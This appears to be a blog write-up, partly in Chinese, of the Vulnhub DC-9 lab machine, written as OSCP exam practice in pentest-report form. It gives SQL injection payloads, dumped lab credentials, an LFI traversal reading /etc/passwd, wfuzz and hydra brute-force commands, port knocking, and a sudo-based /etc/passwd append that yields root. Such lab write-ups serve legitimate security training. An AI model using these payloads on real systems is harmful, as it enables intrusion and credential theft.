临近 OSCP Exam了,做点 Vulnhub 的靶机练练手,顺便也练练 Report 的编写。
靶机地址:
https://www.vulnhub.com/entry/dc-9,412/
stuck:
1、拿到 LFI 之后,尝试包含 /proc/self/fd getshell 无果。然后就翻了翻攻略。发现了 Linux knockd 这种东西
2、做题的时候没有爆所有的数据库,只爆了当前库,导致 ssh brute 的时候跑了一万年都没跑出来 = =。翻攻略才发现账号密码在另一个数据库里。
OSCP Exam Report 的模板在此:
https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf
由于 Report 中只有第三节是重点,所以本节就直接仿照第三节来写了。
3.2 Report – Service Enumeration
| Server IP Address | Ports Open | Service / Banner |
|---|---|---|
| 192.168.92.167 | 22, 80 | ssh / Apache |
3.3 Report – Penetration
Vulnerability Exploited: SQL Inject and LFI
System Vulnerable: 192.168.92.167
Vulnerability Explanation: There are one sql inject and a local file inclusion(LFI) vulnerability in this web application. A combination of these vulnerabilities was used to obtain a low privilege shell.
Privilege Escalation Vulnerability: Abuse sudo permission
Vulnerability Fix: sql syntax filter
Severity: Critical
Information Gathering:
kali@kali:~/Desktop$ sudo nmap -sV -A 192.168.92.167 -n
……
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
…..
Find a SQL inject in the port 80 website.url is:
http://192.168.92.167/results.php
Testing payload:
‘ or 1=1 #
Get the current database type:
‘ union select 1,2,3,4,5,(select version()) #
Enum all databases:
‘ union select 1,2,3,4,5,(select schema_name from information_schema.schemata limit 0,1) #
Change the “limit” value and resend. Get three database schemases:
information_schema
Staff
users
Check current used database:
Get all tables of current used database:
‘ union select 1,2,3,4,5,(select table_name from information_schema.tables where table_schema=database() limit 0,1) #
Change the “limit” value and resend. Get two tables:
StaffDetails
Users
Get all columns in table “Users”
‘ union select 1,2,3,4,5,(select column_name from information_schema.columns where table_schema=database() and table_name=’Users‘ limit 0,1) #
Change the “limit” value and resend. Get three tables:
UserID
Username
Password
By above information,We can get the username and password directly by sql inject:
Payload:
‘ union select 1,2,3,4,5,(select username from Users limit 0,1) #
‘ union select 1,2,3,4,5,(select password from Users limit 0,1) #
Get the following information:
| Username | Password |
|---|---|
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
go to the website https://www.somd5.com/ and successful crack the md5 hash,Plaintext is transorbital1 :
Now we should enum the tables of database “users”. The steps are like the above steps,so I just only the payload here
payload to get all tables of database “users”
‘ union select 1,2,3,4,5,(select table_name from information_schema.tables where table_schema=’users‘ limit 0,1) #
Get one tables:
UserDetails
payload to get all columns of table “UserDetails”, database “users”
‘ union select 1,2,3,4,5,(select column_name from information_schema.columns where table_name=’UserDetails’ and table_schema=’users’ limit 0,1) #
Get six columns:
id
firstname
lastname
username
password
reg_date
Find an intersting column “password”.Go to “Brup intruder” to fetch all username and password in table”UserDetails” database “users”
Payload:
‘ union select 1,2,3,4,5,(select password from users.UserDetails limit §0§,1) #
‘ union select 1,2,3,4,5,(select username from users.UserDetails limit §0§,1) #
Get following username and password:
marym:3kfs86sfd
julied:468sfdfsd2
fredf:4sfd87sfd1
barneyr:RocksOff
tomc:TC&TheBoyz
jerrym:B8m#48sd
wilmaf:Pebbles
bettyr:BamBam01
chandlerb:UrAG0D!
joeyt:Passw0rd
rachelg:yN72#dsd
rossg:ILoveRachel
monicag:3248dsds7s
phoebeb:smellycats
scoots:YR3BVxxxw87
janitor:Ilovepeepee
janitor2:Hawaii-Five-0
Sql inejct finished.Now we logging in target website as user “admin” password “transorbital1”
Note the line “File does not exits”
Try to use following payload:
http://192.168.92.167/manage.php?file=../../../../../etc/passwd
Brute linux local file:
wfuzz -u http://192.168.92.167/manage.php?file=../../../../..FUZZ -w Linux_File.txt -b “PHPSESSID=an0drpvpbm4gv0e70s99nj5evc” –hh 1341
Find an intersting file “knockd.conf”
We need request port 7469, port 8475, port 9842 then ssh will be opened.
knockd those ports:
ssh is opened now. Use hydra to brute ssh.username and password dict is the username and password that be got in table “UserDetails”, database “users”
hydra -C userpass.txt ssh://192.168.92.167 -t 4 -vV
Get three users and passwords:
login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee
ssh logging in the target as user “janitor”. Find an intersting file in /home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt
seems like password for the ohter user.
Let’s turn to hydra again and brute ssh. password dict is the password in file /home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt
hydra -L user.txt -P pass.txt ssh://192.168.92.167 -t 4
Get one user and password:
fredf:B4-Tru3-001
ssh logging in the target as user “fredf”. Eunmeration for sudo Permissions.
Try to run this executable file.
Testing the feature “append” of this executable file
Try to append a new line to /etc/passwd
fredf@dc-9:~/app$ echo ‘panpan:zZoY87S9mdtnk:0:0:root:/root:/bin/bash’ > 6.txt
fredf@dc-9:~/app$ sudo /opt/devstuff/dist/test/test 6.txt /etc/passwd
cat /etc/passwd
su panpan
Proof file:
